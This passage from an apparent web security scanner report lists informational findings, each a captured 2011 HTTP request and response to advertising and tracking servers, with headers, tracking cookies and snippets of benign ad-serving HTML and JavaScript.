3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0024.rm.bf1
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:00 GMT
Pragma: no-cache
Content-Length: 105
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>
20.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:2|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGi:1|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX6:1|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FOGiGJX6:1|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
20.10. http://arstechnica.com/public/shared/scripts/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://arstechnica.com
Path:   /public/shared/scripts/empty.html

Request

GET /public/shared/scripts/empty.html?cb=76281 HTTP/1.1
Host: arstechnica.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199748606.1305051745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199748606.420037276.1305051745.1305051745.1305051745.1; phpbb3_5qbzr_u=1; phpbb3_5qbzr_k=; phpbb3_5qbzr_sid=15183fa6ce53f5ab42a35606030e6bc4

Response

HTTP/1.1 200 OK
X-ID: .13/vm3
Vary: Accept-Encoding
Content-Type: text/html
ETag: "1562295087"
Last-Modified: Wed, 11 May 2011 20:14:45 GMT
Content-Length: 146
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Thu, 12 May 2011 13:27:52 GMT
X-Varnish: 999515587 999515583
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<html>
<head><style>body#emptyFrame{background:black;}</style></head>
<body id="emptyFrame">
<!--EMPTY HTML TO CLEAR DART FRAME-->
</body>
</html>
20.11. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Request

GET /AdServer/Artemis?dpid=1&segid=D,T,5802,5798,5789,5785 HTTP/1.1
Host: aud.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.1.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:33 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success
20.12. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:14 GMT
Set-Cookie: mt_mop=4:1305207074; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:14 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:10 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 896
Content-Type: text/html
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359963/direct/01/254397468447254047?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254397468447254047%
...[SNIP]...
20.13. http://bpx.a9.com/amzn/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /amzn/iframe.html

Request

GET /amzn/iframe.html HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats="sinDsHPuWlsOp9v8v1xuZBiYj2tNfmDcgTOPhhZG/A0="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"303-1298572831000"
Last-Modified: Thu, 24 Feb 2011 18:40:31 GMT
Content-Type: text/html
Content-Length: 303
Date: Thu, 12 May 2011 13:32:51 GMT

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html>
<body scrolling='no' frameborder='0' marginheight='0' marginwidth='0' ma
...[SNIP]...
20.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344481&PluID=0&w=300&h=250&ord=2310578&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/w%3B236732442%3B0-0%3B0%3B31555527%3B4307-300/250%3B41285215/41303002/1%3B%3B%7Eaopt%3D2/1/81/0%3B%7Esscs%3D%3f$$&z=800 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001klD7aM7G077T00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA90N.0000000001uB9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001klD7aM7G077T00001jFT.aLQg0duS00001kgh7aLQg02WG00001jpA4aM9n0bdR00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB8Yox0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA90N.0000000001uB910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close
Content-Length: 2847

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
20.15. http://cdn-bpx.a9.com/amzn/defaultad.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-bpx.a9.com
Path:   /amzn/defaultad.html

Request

GET /amzn/defaultad.html HTTP/1.1
Host: cdn-bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: cl3qcfSmOCYl5VLLwbYT7DWkpYk36HpU4p1/bwijf640W5byFDcIhP6qM/yv8qw/
x-amz-request-id: 02F558417A35D2E1
Date: Thu, 05 May 2011 22:48:18 GMT
x-amz-meta-content-encoding: gzip
x-amz-meta-content-type: text/html
x-amz-meta-group: 1896053708
x-amz-meta-owner: 901924212
x-amz-meta-permissions: 33188
Last-Modified: Thu, 20 Jan 2011 07:29:38 GMT
ETag: "c4de487919c422462444c197a6e75b38"
Accept-Ranges: bytes
Content-Type: text/html
Server: AmazonS3
Age: 74550
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: bacdbb97b57270a2b56bc8a8a86fafa5995a790586f79ba965d52983f36c9cebc61803de448580d4
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 dc29e4f8e83ef73d536a9ad63d11a50e.cloudfront.net:11180 (CloudFront)
Connection: keep-alive
Content-Length: 287

<html><body>
<script language='javascript'>

var i=0;
bpxframe = window;

while(i++<10) {

bpxframe = bpxframe.parent;

try{
if(typeof bpxframe.a9_bpx_punt =='function') break;
} catch(e) {}

if(bpx
...[SNIP]...
20.16. http://cdn-bpx.a9.com/amzn/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-bpx.a9.com
Path:   /amzn/iframe.html

Request

GET /amzn/iframe.html HTTP/1.1
Host: cdn-bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: PR4KXTrGCu8OUY8fq62S3kd/ilGofKSl5MzDptlD2dem3yq7ZSETaHwXQ/9WHdf+
x-amz-request-id: 7DD31C3B173DB2E0
Date: Mon, 09 May 2011 14:53:21 GMT
x-amz-meta-content-encoding: gzip
x-amz-meta-content-type: text/html
x-amz-meta-group: 1896053708
x-amz-meta-owner: 901924212
x-amz-meta-permissions: 33188
Last-Modified: Thu, 20 Jan 2011 07:29:52 GMT
ETag: "6790df878721cdefdc20a1972e8775bf"
Accept-Ranges: bytes
Content-Type: text/html
Server: AmazonS3
Age: 79981
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 617db72bfb06703d18b39b0dfa8542b52c699b54404c4631c48193ca95c5a1ab3dd625c822c3d841
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 dc29e4f8e83ef73d536a9ad63d11a50e.cloudfront.net:11180 (CloudFront)
Connection: keep-alive
Content-Length: 307

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html>
<body scrolling='no' frameborder='0' marginheight='0' marginwidth='0' ma
...[SNIP]...
20.17. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.4319008697356448&pageURL=http://www.pubmatic.com/aboutus/overview HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/aboutus/overview
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.2.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:24 GMT
